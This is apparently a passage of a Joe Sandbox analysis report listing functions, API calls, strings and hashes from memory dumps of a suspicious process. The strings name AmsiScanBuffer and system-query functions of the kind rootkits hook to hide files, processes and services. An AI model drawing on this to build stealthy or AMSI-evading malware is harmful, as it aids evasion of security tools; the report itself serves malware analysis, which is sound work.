Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 8608ff7e3106e504176d4ce4d08d2332e48d05dd4e4b8f5001fabdccf8e53eb4
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 14518D75A18A5BF5EA00DB74E8516F827A2BF417E8FC40532E63B12171EE78825ECB41

Function 000001F1197D3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001F1197D3A35
PathFindFileNameW.SHLWAPI ref: 000001F1197D3A44

Part of subcall function 000001F1197D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001F1197D272F), ref: 000001F1197D3FA0

Part of subcall function 000001F1197D3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3EDB
Part of subcall function 000001F1197D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F0E
Part of subcall function 000001F1197D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F2E
Part of subcall function 000001F1197D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F47
Part of subcall function 000001F1197D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F68

CreateThread.KERNELBASE ref: 000001F1197D3A8B

Part of subcall function 000001F1197D1E74: GetCurrentThread.KERNEL32 ref: 000001F1197D1E7F
Part of subcall function 000001F1197D1E74: CreateThread.KERNELBASE ref: 000001F1197D2043
Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2049
Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2055
Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2061
Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D206D
Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2079
Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2085

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: bcfa1e699537b31cf7380b092e16c2800d7b324eeb8ef57ecad7f77effc4225b
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 26110532718603E2FB649731A94A3FD22D2AF947C9FD04139E637921D1EE7AC44C8E51

Function 000001F119D5F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001F119D5F611
GetFileType.KERNELBASE ref: 000001F119D5F627

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: e8814af4bbb443cc36d56d7f977ad69e113dd95853ee7cc615e3f062641d6d05
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: D4315032618B4AE1EF648B3995803B96662F345BE4FA50359DBBB4B3F0CB35D4A1D340

Function 000001F1197DF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001F1197DF611
GetFileType.KERNELBASE ref: 000001F1197DF627

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 847fdeab688967f44fa040a3fe45b9419560f71aca3dd7caa583aa153a52593a
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: A2319332628B46E1DB608B3495802BD2692FB45BF0FA50319DBBB177F0CB35D465C740

Function 000001F119792EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001F11979302E

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: b78735698d040ed6ab0dfe9d9e0d2e350d3222b04f0098484a61ed04758fa10d
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: F591C272B05552D7EB648F39D400BBD7392FB54BE8F949134DF6A07798EA38D8168B00

Function 000001F1197D1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001F1197D1724: GetProcessHeap.KERNEL32 ref: 000001F1197D172F
Part of subcall function 000001F1197D1724: HeapAlloc.KERNEL32 ref: 000001F1197D173E
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D17AE
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D17DB
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D17F5
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1815
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D1830
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1850
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D186B
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D188B
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D18A6
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D18C6

SleepEx.KERNELBASE ref: 000001F1197D1BDF

Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D18E1
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1901
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D191C
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D193C
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D1957
Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1977
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D1992
Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D199C

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 8c5ded9d7a8153fe8965c62a8c2f6ed1289f378f544b193f4f20cad4b6c6f417
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 7031CB76308642E1EA589B36F6913FD23E6BF44BD0F845431DF2F87696EF14C8588A14

Non-executed Functions

Function 000001F119D52FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001F119D53094
lstrlenW.KERNEL32 ref: 000001F119D532BE

Part of subcall function 000001F119D51A30: OpenProcess.KERNEL32 ref: 000001F119D51A56
Part of subcall function 000001F119D51A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001F119D51A74
Part of subcall function 000001F119D51A30: PathFindFileNameW.SHLWAPI ref: 000001F119D51A83
Part of subcall function 000001F119D51A30: lstrlenW.KERNEL32 ref: 000001F119D51A8F
Part of subcall function 000001F119D51A30: StrCpyW.SHLWAPI ref: 000001F119D51AA2
Part of subcall function 000001F119D51A30: CloseHandle.KERNEL32 ref: 000001F119D51AB0

GetProcAddress.KERNEL32 ref: 000001F119D530A9

Part of subcall function 000001F119D53F88: StrCmpNIW.SHLWAPI(?,?,?,000001F119D5272F), ref: 000001F119D53FA0

StrCmpNIW.SHLWAPI ref: 000001F119D530EC
lstrlenW.KERNEL32 ref: 000001F119D53214

Strings

NtQueryObject, xrefs: 000001F119D5309F
\Device\Nsi, xrefs: 000001F119D530DF
ntdll.dll, xrefs: 000001F119D5308D

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 0ef0d7b3f5b37917baa858f0e013441e652206fd7ff9a4d5d4805b32e0a31a80
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: D1B14A32218A9AE2FF658F7595407F9E3B6F744B84F845026EF2A93794DE35C990C340

Function 000001F1197D2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001F1197D3094
lstrlenW.KERNEL32 ref: 000001F1197D32BE

Part of subcall function 000001F1197D1A30: OpenProcess.KERNEL32 ref: 000001F1197D1A56
Part of subcall function 000001F1197D1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001F1197D1A74
Part of subcall function 000001F1197D1A30: PathFindFileNameW.SHLWAPI ref: 000001F1197D1A83
Part of subcall function 000001F1197D1A30: lstrlenW.KERNEL32 ref: 000001F1197D1A8F
Part of subcall function 000001F1197D1A30: StrCpyW.SHLWAPI ref: 000001F1197D1AA2
Part of subcall function 000001F1197D1A30: CloseHandle.KERNEL32 ref: 000001F1197D1AB0

GetProcAddress.KERNEL32 ref: 000001F1197D30A9

Part of subcall function 000001F1197D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001F1197D272F), ref: 000001F1197D3FA0

StrCmpNIW.SHLWAPI ref: 000001F1197D30EC
lstrlenW.KERNEL32 ref: 000001F1197D3214

Strings

\Device\Nsi, xrefs: 000001F1197D30DF
NtQueryObject, xrefs: 000001F1197D309F
ntdll.dll, xrefs: 000001F1197D308D

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 232c2e04594ff828c422d42458b0fb98eacaa6f29662638dca0c9d352219da26
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 82B15A72218A92E2EB588F3595407FDA3E6FF45BC8F845026EF2A53794DA35C948CB40

Function 000001F119D584B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F119D584CC
RtlCaptureContext.NTDLL ref: 000001F119D584F9
RtlLookupFunctionEntry.NTDLL ref: 000001F119D58513
RtlVirtualUnwind.NTDLL ref: 000001F119D58554
IsDebuggerPresent.KERNEL32 ref: 000001F119D585A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F119D585C5
UnhandledExceptionFilter.KERNEL32 ref: 000001F119D585D0

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: b91a0d682df5856898b1328428cf39bee276f93f4a5f8c588e5987275ae4eebb
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 04311872209B85D6EB608F60E8403EE6376F788748F84402ADB5E47B98DF78C688C710

Function 000001F1197D84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F1197D84CC
RtlCaptureContext.NTDLL ref: 000001F1197D84F9
RtlLookupFunctionEntry.NTDLL ref: 000001F1197D8513
RtlVirtualUnwind.NTDLL ref: 000001F1197D8554
IsDebuggerPresent.KERNEL32 ref: 000001F1197D85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F1197D85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001F1197D85D0

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: eccad80ba7346fefe32b38bcdc6f8dcd2785a4049c55153aec196941a979fa7b
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 52312D72209B95D6EB608F60E8403ED73A5FB84788F84402ADB5E47B94EF78C648CB10

Function 000001F119D5CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F119D5CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001F119D5CE23
RtlVirtualUnwind.NTDLL ref: 000001F119D5CE5E
IsDebuggerPresent.KERNEL32 ref: 000001F119D5CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F119D5CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001F119D5CEAC

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 34cf1c4fed8f77815ee018c9dfd184534307199c2e6aef4f9bbbdcee935c563c
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 23415C36618B85D6EB60CB34E8403EE73A5F789754F900225EBAE47B98DF38C555CB40

Function 000001F1197DCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F1197DCE0B
RtlLookupFunctionEntry.NTDLL ref: 000001F1197DCE23
RtlVirtualUnwind.NTDLL ref: 000001F1197DCE5E
IsDebuggerPresent.KERNEL32 ref: 000001F1197DCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F1197DCEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001F1197DCEAC

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 616f3185b3cec4ce2ff8ef98dcda79f2db60c3b03cb88971ff00e924c6603e8e
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: C4412E37618B81D6DB608B35E8403EE73A5FB88798F940125EBAE46B94DF38C5598B00

Function 000001F119D5DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001F119D5DB99
FindNextFileW.KERNEL32 ref: 000001F119D5DCCF
FindClose.KERNEL32 ref: 000001F119D5DD0F
FindClose.KERNEL32 ref: 000001F119D5DD3B

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 6f19a5f829edcf7152993ceb78de2d7fdc558bc481f3dcc8011a5eaec3fca814
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 89A1D63270868AE9FF20DB7594403FE6BB2A745794F944135DBAA2B699CA78C443C710

Function 000001F1197DDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001F1197DDB99
FindNextFileW.KERNEL32 ref: 000001F1197DDCCF
FindClose.KERNEL32 ref: 000001F1197DDD0F
FindClose.KERNEL32 ref: 000001F1197DDD3B

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 3106aedaa9bc1db29f3931f9bb689b74ed9c49973e3fcd77ede45d25e4864941
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 4CA1D73370C682E9FB219B7598403FD6BE6EB817D4F944135DBAA2BE95DA34C449CB00

Function 000001F1197D8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F1197D80BC
GetCurrentThreadId.KERNEL32 ref: 000001F1197D80CA
GetCurrentProcessId.KERNEL32 ref: 000001F1197D80D6
QueryPerformanceCounter.KERNEL32 ref: 000001F1197D80E6

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: ccff4b742e9354236959d03df2ed758253582a02e279fce27ce63758d4e2ce7c
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 39111836714B15DAEB00CB70E8553B833A4FB19798F840E35EB6E867A4EB78C1588740

